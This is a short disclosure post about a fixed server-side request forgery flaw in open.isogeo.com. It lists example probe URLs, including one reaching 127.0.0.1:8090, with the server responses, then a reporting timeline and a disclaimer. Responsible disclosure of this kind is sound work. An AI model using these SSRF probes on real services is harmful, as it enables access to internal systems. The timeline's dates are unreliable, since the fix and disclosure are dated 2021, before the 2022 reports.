SSRF found and fixed in open.isogeo.com
A SSFR vulnerability was resolved in open.isogeo.com using the path https://open.isogeo.com/map/schema://url
E.g. this call gave me google France (outside of France)
https://open.isogeo.com/map/https://www.google.com
https://open.isogeo.com/map/http://www.google.com
https://open.isogeo.com/map/www.google.com
Internal access may also have been possible
https://open.isogeo.com/map/127.0.0.1:8090
{"error":{"errno":"EACCES","code":"EACCES","syscall":"connect","address":"127.0.0.1","port":8090}}
https://open.isogeo.com/map/unknownhost
after some timeout:
{"error":{"errno":"ENOTFOUND","code":"ENOTFOUND","syscall":"getaddrinfo","hostname":"unknownhost"}}
Now it’s fixed, response is only:
{"link":"/map"}
Timeline
2022-01-05 Report sent, but I got Your email was rejected due to spam classification.
2022-01-09 Report sent to CERT France
2022-01-12 Response from isogeo about my finding
2021-01-xx Issue was resolved without further reply
2021-02-08 Disclosure as blog post
TL;DR
HowTo vulnerability hunting?
It was an accident ;-)
I searched something different for some opendata web service and found an opendata service in France.
I saw in browser F12 Dev console an URL call for an image, which was no redirect by browser.
https://open.isogeo.com/map/getImage/https://www…….
I catched this SSRF just by copy & paste error without part /getImage/.
Disclaimer
The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.
The contents of this advisory are copyright (c) 2022 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.